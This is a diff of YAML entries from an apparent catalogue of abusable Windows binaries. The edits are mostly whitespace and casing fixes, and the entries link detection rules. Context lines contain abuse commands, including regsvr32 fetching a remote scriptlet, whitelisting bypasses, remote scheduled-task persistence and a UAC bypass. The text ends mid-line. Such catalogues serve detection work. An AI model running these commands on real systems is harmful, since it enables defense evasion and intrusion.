diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index 894317c..46b87fe 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml +++ b/yml/OSBinaries/Infdefaultinstall.yml @@ -15,10 +15,10 @@ Full_Path: - Path: C:\Windows\System32\Infdefaultinstall.exe - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe Code_Sample: -- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a + - Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules Resources: - Link: https://twitter.com/KyleHanslovan/status/911997635455852544 - Link: https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/ @@ -26,4 +26,3 @@ Resources: Acknowledgement: - Person: Kyle Hanslovan Handle: '@kylehanslovan' ---- diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index 4314b56..b257c39 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -7,7 +7,7 @@ Commands: - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll Description: Execute the target .NET DLL or EXE. Usecase: Use to execute code and bypass application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 
@@ -24,11 +24,11 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml - - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml + - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml + - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml + - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml Resources: - Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 @@ -39,4 +39,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSBinaries/Jsc.yml b/yml/OSBinaries/Jsc.yml index 9e2af4a..bb1d012 100644 --- a/yml/OSBinaries/Jsc.yml +++ b/yml/OSBinaries/Jsc.yml @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: Malwrologist Handle: '@DissectMalware' ---- diff --git a/yml/OSBinaries/Makecab.yml b/yml/OSBinaries/Makecab.yml index 7776867..40a8e0c 100644 --- a/yml/OSBinaries/Makecab.yml +++ b/yml/OSBinaries/Makecab.yml @@ -40,4 +40,3 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- 
diff --git a/yml/OSBinaries/Mavinject.yml b/yml/OSBinaries/Mavinject.yml index a713768..1a184d3 100644 --- a/yml/OSBinaries/Mavinject.yml +++ b/yml/OSBinaries/Mavinject.yml @@ -36,4 +36,3 @@ Acknowledgement: Handle: '@gN3mes1s' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml index 5d1f884..beaf2c0 100644 --- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml +++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml @@ -56,4 +56,3 @@ Acknowledgement: Handle: '@FortyNorthSec' - Person: Bank Security Handle: '@Bank_Security' ---- diff --git a/yml/OSBinaries/Mmc.yml b/yml/OSBinaries/Mmc.yml index 4bf70e8..5b8f1bd 100644 --- a/yml/OSBinaries/Mmc.yml +++ b/yml/OSBinaries/Mmc.yml @@ -22,10 +22,10 @@ Full_Path: - Path: C:\Windows\System32\mmc.exe - Path: C:\Windows\SysWOW64\mmc.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mmc_spawn_shell.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mmc_spawn_shell.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml Resources: - Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ - Link: https://offsec.almond.consulting/UAC-bypass-dotnet.html @@ -34,4 +34,3 @@ Acknowledgement: Handle: '@bohops' - Person: clem Handle: '@clavoillotte' ---- diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml index 33ac149..1707ea6 100644 --- a/yml/OSBinaries/MpCmdRun.yml +++ b/yml/OSBinaries/MpCmdRun.yml 
@@ -53,4 +53,3 @@ Acknowledgement: Handle: '' - Person: Cedric Handle: '@th3c3dr1c' ---- diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index abb2597..705d0c0 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -7,7 +7,7 @@ Commands: - Command: msbuild.exe pshell.xml Description: Build and execute a C# project stored in the target XML file. Usecase: Compile and run code - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 @@ -60,7 +60,7 @@ Detection: - Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - IOC: Msbuild.exe should not normally be executed on workstations Resources: - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md @@ -77,4 +77,3 @@ Acknowledgement: Handle: '@Cneelis' - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OSBinaries/Msconfig.yml b/yml/OSBinaries/Msconfig.yml index 6b59858..c4ce1c1 100644 --- a/yml/OSBinaries/Msconfig.yml +++ b/yml/OSBinaries/Msconfig.yml @@ -24,4 +24,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- 
diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml index 7f65131..17d027c 100644 --- a/yml/OSBinaries/Msdt.yml +++ b/yml/OSBinaries/Msdt.yml @@ -14,7 +14,7 @@ Commands: - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. Usecase: Execute code bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 @@ -33,4 +33,3 @@ Resources: Acknowledgement: - Person: Handle: ---- diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index 2f68ca7..43717d7 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -69,4 +69,3 @@ Acknowledgement: Handle: '@subtee' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index c9bc676..12722c9 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -51,4 +51,3 @@ Acknowledgement: Handle: '@netbiosX' - Person: Philip Tsukerman Handle: '@PhilipTsukerman' ---- diff --git a/yml/OSBinaries/Netsh.yml b/yml/OSBinaries/Netsh.yml index b8f459c..b004ed2 100644 --- a/yml/OSBinaries/Netsh.yml +++ b/yml/OSBinaries/Netsh.yml @@ -34,4 +34,3 @@ Acknowledgement: Handle: - Person: 'Xabier Ugarte-Pedrero' Handle: ---- diff --git a/yml/OSBinaries/Odbcconf.yml b/yml/OSBinaries/Odbcconf.yml index 7163688..c750fc0 100644 --- a/yml/OSBinaries/Odbcconf.yml +++ b/yml/OSBinaries/Odbcconf.yml @@ -36,4 +36,3 @@ Acknowledgement: Handle: '@subtee' - Person: Adam Handle: '@Hexacorn' ---- diff --git a/yml/OSBinaries/OfflineScannerShell.yml b/yml/OSBinaries/OfflineScannerShell.yml index fd85398..bcb0ad9 100644 --- a/yml/OSBinaries/OfflineScannerShell.yml +++ b/yml/OSBinaries/OfflineScannerShell.yml 
@@ -19,4 +19,3 @@ Detection: Acknowledgement: - Person: Elliot Killick Handle: '@elliotkillick' ---- diff --git a/yml/OSBinaries/OneDriveStandaloneUpdater.yml b/yml/OSBinaries/OneDriveStandaloneUpdater.yml index b61a6e8..f49529e 100644 --- a/yml/OSBinaries/OneDriveStandaloneUpdater.yml +++ b/yml/OSBinaries/OneDriveStandaloneUpdater.yml @@ -21,4 +21,3 @@ Resources: Acknowledgement: - Person: Elliot Killick Handle: '@elliotkillick' ---- diff --git a/yml/OSBinaries/Pcalua.yml b/yml/OSBinaries/Pcalua.yml index e61cf7b..be79c37 100644 --- a/yml/OSBinaries/Pcalua.yml +++ b/yml/OSBinaries/Pcalua.yml @@ -38,4 +38,3 @@ Acknowledgement: Handle: '@kylehanslovan' - Person: Fab Handle: '@0rbz_' ---- diff --git a/yml/OSBinaries/Pcwrun.yml b/yml/OSBinaries/Pcwrun.yml index e1bdc30..3bab933 100644 --- a/yml/OSBinaries/Pcwrun.yml +++ b/yml/OSBinaries/Pcwrun.yml @@ -22,4 +22,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OSBinaries/Pktmon.yml b/yml/OSBinaries/Pktmon.yml index 3a0e4af..99b89a6 100644 --- a/yml/OSBinaries/Pktmon.yml +++ b/yml/OSBinaries/Pktmon.yml @@ -31,4 +31,3 @@ Resources: Acknowledgement: - Person: Derek Johnson Handle: '' ---- diff --git a/yml/OSBinaries/Pnputil.yml b/yml/OSBinaries/Pnputil.yml index 512ae99..a032008 100644 --- a/yml/OSBinaries/Pnputil.yml +++ b/yml/OSBinaries/Pnputil.yml @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10,7 Full_Path: - Path: C:\Windows\system32\pnputil.exe -Code_Sample: +Code_Sample: - Code: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/a8a0d546f347febb0423aa920dbc10713cc1f92f/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml @@ -22,4 +22,3 @@ Acknowledgement: Handle: '@LuxNoBulIshit' - Person: Avihay eldad Handle: '@aloneliassaf' ---- 
diff --git a/yml/OSBinaries/Presentationhost.yml b/yml/OSBinaries/Presentationhost.yml index c5deac3..957ae44 100644 --- a/yml/OSBinaries/Presentationhost.yml +++ b/yml/OSBinaries/Presentationhost.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSBinaries/Print.yml b/yml/OSBinaries/Print.yml index ed0405a..215a6e9 100644 --- a/yml/OSBinaries/Print.yml +++ b/yml/OSBinaries/Print.yml @@ -40,4 +40,3 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/PrintBrm.yml b/yml/OSBinaries/PrintBrm.yml index 8dec4db..634c49d 100644 --- a/yml/OSBinaries/PrintBrm.yml +++ b/yml/OSBinaries/PrintBrm.yml @@ -28,4 +28,3 @@ Resources: Acknowledgement: - Person: Elliot Killick Handle: '@elliotkillick' ---- diff --git a/yml/OSBinaries/Psr.yml b/yml/OSBinaries/Psr.yml index ba36c95..56b9bd6 100644 --- a/yml/OSBinaries/Psr.yml +++ b/yml/OSBinaries/Psr.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Leon Rodenko Handle: '@L3m0nada' ---- diff --git a/yml/OSBinaries/Rasautou.yml b/yml/OSBinaries/Rasautou.yml index 0caf9b6..459d579 100644 --- a/yml/OSBinaries/Rasautou.yml +++ b/yml/OSBinaries/Rasautou.yml @@ -24,4 +24,3 @@ Resources: Acknowledgement: - Person: FireEye Handle: '@FireEye' ---- diff --git a/yml/OSBinaries/Rdrleakdiag.yml b/yml/OSBinaries/Rdrleakdiag.yml index dedb202..77b13a0 100644 --- a/yml/OSBinaries/Rdrleakdiag.yml +++ b/yml/OSBinaries/Rdrleakdiag.yml @@ -41,4 +41,3 @@ Resources: Acknowledgement: - Person: Grzegorz Tworek Handle: '@0gtweet' ---- \ No newline at end of file diff --git a/yml/OSBinaries/Reg.yml b/yml/OSBinaries/Reg.yml index 3e0443b..b48e146 100644 --- a/yml/OSBinaries/Reg.yml +++ b/yml/OSBinaries/Reg.yml @@ -36,4 +36,3 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml index 5aa2b44..ea30825 100644 --- a/yml/OSBinaries/Regasm.yml 
+++ b/yml/OSBinaries/Regasm.yml @@ -7,7 +7,7 @@ Commands: - Command: regasm.exe AllTheThingsx64.dll Description: Loads the target .DLL file and executes the RegisterClass function. Usecase: Execute code and bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: Local Admin MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 @@ -38,4 +38,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSBinaries/Regedit.yml b/yml/OSBinaries/Regedit.yml index 3febc17..4ea0657 100644 --- a/yml/OSBinaries/Regedit.yml +++ b/yml/OSBinaries/Regedit.yml @@ -32,4 +32,3 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Regini.yml b/yml/OSBinaries/Regini.yml index a19af48..717ddc5 100644 --- a/yml/OSBinaries/Regini.yml +++ b/yml/OSBinaries/Regini.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Eli Salem Handle: '@elisalem9' ---- diff --git a/yml/OSBinaries/Register-cimprovider.yml b/yml/OSBinaries/Register-cimprovider.yml index f3a98f2..df1653b 100644 --- a/yml/OSBinaries/Register-cimprovider.yml +++ b/yml/OSBinaries/Register-cimprovider.yml @@ -24,4 +24,3 @@ Resources: Acknowledgement: - Person: Philip Tsukerman Handle: '@PhilipTsukerman' ---- diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index 5b8f856..a0600d3 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml @@ -14,7 +14,7 @@ Commands: - Command: regsvcs.exe AllTheThingsx64.dll Description: Loads the target .DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: Local Admin MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- 
diff --git a/yml/OSBinaries/Regsvr32.yml b/yml/OSBinaries/Regsvr32.yml index 08a9e44..9fcabc7 100644 --- a/yml/OSBinaries/Regsvr32.yml +++ b/yml/OSBinaries/Regsvr32.yml @@ -7,14 +7,14 @@ Commands: - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll Description: Execute the specified remote .SCT script with scrobj.dll. Usecase: Execute code from remote scriptlet, bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 @@ -36,7 +36,7 @@ Full_Path: - Path: C:\Windows\System32\regsvr32.exe - Path: C:\Windows\SysWOW64\regsvr32.exe Code_Sample: - - Code: + - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6fbce11094285e5ba13fe101b9cb70f5b1ece198/rules/windows/process_creation/win_susp_regsvr32_anomalies.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6d56e400d209daa77a7900d950a7c587dc0cd2e5/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml @@ -57,4 +57,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSBinaries/Replace.yml b/yml/OSBinaries/Replace.yml index 23a6d3f..aed6a0a 100644 --- a/yml/OSBinaries/Replace.yml +++ b/yml/OSBinaries/Replace.yml @@ -32,4 +32,3 @@ Resources: Acknowledgement: - Person: elceef Handle: '@elceef' ---- diff --git a/yml/OSBinaries/Rpcping.yml b/yml/OSBinaries/Rpcping.yml index 9f6d1bc..aa45372 100644 --- a/yml/OSBinaries/Rpcping.yml +++ b/yml/OSBinaries/Rpcping.yml @@ -39,4 +39,3 @@ Acknowledgement: Handle: '@splinter_code' - Person: ap Handle: '@decoder_it' ---- 
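Review bot: Trimming the trailing space on `- Code:` in the `@@ -36,7 +36,7 @@` hunk leaves a bare empty value, which YAML loaders read as null rather than as an empty string; a schema that types `Code` as a string will reject it, and one that does not will presumably hand a null to whatever renders the page. Either write the empty entry explicitly as `- Code: ''` or make `Code_Sample: []` the empty form, and apply the same choice to the other entries on this page that carry a bare `- Code:` (Vbc, Dfshim, CL_LoadAssembly). The rest of the Regsvr32 file is outside this hunk.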
diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index bd8acc1..712c8c4 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -91,4 +91,3 @@ Acknowledgement: Handle: '@404death' - Person: Martin Ingesen Handle: '@Mrtn9' ---- diff --git a/yml/OSBinaries/Runonce.yml b/yml/OSBinaries/Runonce.yml index 0190d5c..349c645 100644 --- a/yml/OSBinaries/Runonce.yml +++ b/yml/OSBinaries/Runonce.yml @@ -1,6 +1,6 @@ --- Name: Runonce.exe -Description: +Description: Executes a Run Once Task that has been configured in the registry Author: 'Oddvar Moe' Created: 2018-05-25 Commands: @@ -27,4 +27,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OSBinaries/Runscripthelper.yml b/yml/OSBinaries/Runscripthelper.yml index 9409e42..ff6cc63 100644 --- a/yml/OSBinaries/Runscripthelper.yml +++ b/yml/OSBinaries/Runscripthelper.yml @@ -1,6 +1,6 @@ --- Name: Runscripthelper.exe -Description: +Description: Execute target PowerShell script Author: 'Oddvar Moe' Created: 2018-05-25 Commands: @@ -18,7 +18,7 @@ Code_Sample: - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_runscripthelper.yml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - IOC: Event 4014 - Powershell logging - IOC: Event 400 Resources: @@ -26,4 +26,3 @@ Resources: Acknowledgement: - Person: Matt Graeber Handle: '@mattifestation' ---- diff --git a/yml/OSBinaries/Sc.yml b/yml/OSBinaries/Sc.yml index 3f6fcf3..337c4eb 100644 --- a/yml/OSBinaries/Sc.yml +++ b/yml/OSBinaries/Sc.yml @@ -36,4 +36,3 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- 
diff --git a/yml/OSBinaries/Schtasks.yml b/yml/OSBinaries/Schtasks.yml index 4f3e5b5..3aa7e85 100644 --- a/yml/OSBinaries/Schtasks.yml +++ b/yml/OSBinaries/Schtasks.yml @@ -11,7 +11,7 @@ Commands: Privileges: User MitreID: T1053.005 OperatingSystem: Windows - - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily + - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily Description: Create a scheduled task on a remote computer for persistence/lateral movement Usecase: Create a remote task to run daily relative to the the time of creation Category: Execute @@ -33,4 +33,3 @@ Resources: Acknowledgement: - Person: Handle: ---- diff --git a/yml/OSBinaries/Scriptrunner.yml b/yml/OSBinaries/Scriptrunner.yml index 41def89..b27b18b 100644 --- a/yml/OSBinaries/Scriptrunner.yml +++ b/yml/OSBinaries/Scriptrunner.yml @@ -1,6 +1,6 @@ --- Name: Scriptrunner.exe -Description: +Description: Execute binary through proxy binary to evade defensive counter measures Author: 'Oddvar Moe' Created: 2018-05-25 Commands: @@ -33,4 +33,3 @@ Resources: Acknowledgement: - Person: Nick Tyrer Handle: '@nicktyrer' ---- diff --git a/yml/OSBinaries/SettingSyncHost.yml b/yml/OSBinaries/SettingSyncHost.yml index e171778..480fdcb 100644 --- a/yml/OSBinaries/SettingSyncHost.yml +++ b/yml/OSBinaries/SettingSyncHost.yml @@ -31,4 +31,3 @@ Acknowledgement: Handle: '@hexacorn' - Person: Elliot Killick Handle: '@elliotkillick' ---- diff --git a/yml/OSBinaries/Stordiag.yml b/yml/OSBinaries/Stordiag.yml index 8d2b315..62a1bcf 100644 --- a/yml/OSBinaries/Stordiag.yml +++ b/yml/OSBinaries/Stordiag.yml @@ -22,4 +22,3 @@ Resources: Acknowledgement: - Person: Eral4m Handle: '@eral4m' ---- diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml index ffca55a..2f145ff 100644 --- a/yml/OSBinaries/Syncappvpublishingserver.yml +++ b/yml/OSBinaries/Syncappvpublishingserver.yml 
@@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Nick Landers Handle: '@monoxgas' ---- diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml index 84f92ca..ff72cf1 100644 --- a/yml/OSBinaries/Ttdinject.yml +++ b/yml/OSBinaries/Ttdinject.yml @@ -35,4 +35,3 @@ Acknowledgement: Handle: '@oddvarmoe' - Person: Maxime Nadeau Handle: '@m_nad0' ---- diff --git a/yml/OSBinaries/Tttracer.yml b/yml/OSBinaries/Tttracer.yml index 2e8ee54..8c58cc1 100644 --- a/yml/OSBinaries/Tttracer.yml +++ b/yml/OSBinaries/Tttracer.yml @@ -37,4 +37,3 @@ Acknowledgement: Handle: '@oulusoyum' - Person: Matt Graeber Handle: '@mattifestation' ---- diff --git a/yml/OSBinaries/Vbc.yml b/yml/OSBinaries/Vbc.yml index 47d177f..775a788 100644 --- a/yml/OSBinaries/Vbc.yml +++ b/yml/OSBinaries/Vbc.yml @@ -22,13 +22,12 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe Code_Sample: - - Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_visual_basic_compiler.yml - - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_visual_basic_compiler.yml + - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml Acknowledgement: - Person: Lior Adar Handle: - Person: Hai Vaknin(Lux) Handle: ---- diff --git a/yml/OSBinaries/Verclsid.yml b/yml/OSBinaries/Verclsid.yml index bf5280a..e78b91b 100644 --- a/yml/OSBinaries/Verclsid.yml +++ b/yml/OSBinaries/Verclsid.yml 
@@ -1,6 +1,6 @@ --- Name: Verclsid.exe -Description: +Description: Used to verify a COM object before it is instantiated by Windows Explorer Author: '@bohops' Created: 2018-12-04 Commands: @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Nick Tyrer Handle: '@NickTyrer' ---- diff --git a/yml/OSBinaries/Wab.yml b/yml/OSBinaries/Wab.yml index a3652cf..5a15a2a 100644 --- a/yml/OSBinaries/Wab.yml +++ b/yml/OSBinaries/Wab.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Adam Handle: '@Hexacorn' ---- diff --git a/yml/OSBinaries/Wlrmdr.yml b/yml/OSBinaries/Wlrmdr.yml index 303a5fc..42365ae 100644 --- a/yml/OSBinaries/Wlrmdr.yml +++ b/yml/OSBinaries/Wlrmdr.yml @@ -30,4 +30,3 @@ Acknowledgement: Handle: '@Oddvarmoe' - Person: Freddy Handle: '@falsneg' ---- diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index f4271e9..b8737d2 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml @@ -88,4 +88,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSBinaries/WorkFolders.yml b/yml/OSBinaries/WorkFolders.yml index 6d271a1..667c145 100644 --- a/yml/OSBinaries/WorkFolders.yml +++ b/yml/OSBinaries/WorkFolders.yml @@ -24,4 +24,3 @@ Acknowledgement: Handle: '@YoSignals' - Person: Elliot Killick Handle: '@elliotkillick' ---- diff --git a/yml/OSBinaries/Wscript.yml b/yml/OSBinaries/Wscript.yml index e24f33f..7e3161c 100644 --- a/yml/OSBinaries/Wscript.yml +++ b/yml/OSBinaries/Wscript.yml 
@@ -31,7 +31,7 @@ Detection: - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - IOC: Wscript.exe executing code from alternate data streams - IOC: DotNet CLR libraries loaded into wscript.exe - IOC: DotNet CLR Usage Log - wscript.exe.log @@ -42,4 +42,3 @@ Acknowledgement: Handle: '@oddvarmoe' - Person: SaiLay(valen) Handle: '@404death' ---- diff --git a/yml/OSBinaries/Wsreset.yml b/yml/OSBinaries/Wsreset.yml index fcab2d3..86522d7 100644 --- a/yml/OSBinaries/Wsreset.yml +++ b/yml/OSBinaries/Wsreset.yml @@ -7,7 +7,7 @@ Commands: - Command: wsreset.exe Description: During startup, wsreset.exe checks the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command for the command to run. Binary will be executed as a high-integrity process without a UAC prompt being displayed to the user. Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. - Category: UAC bypass + Category: UAC 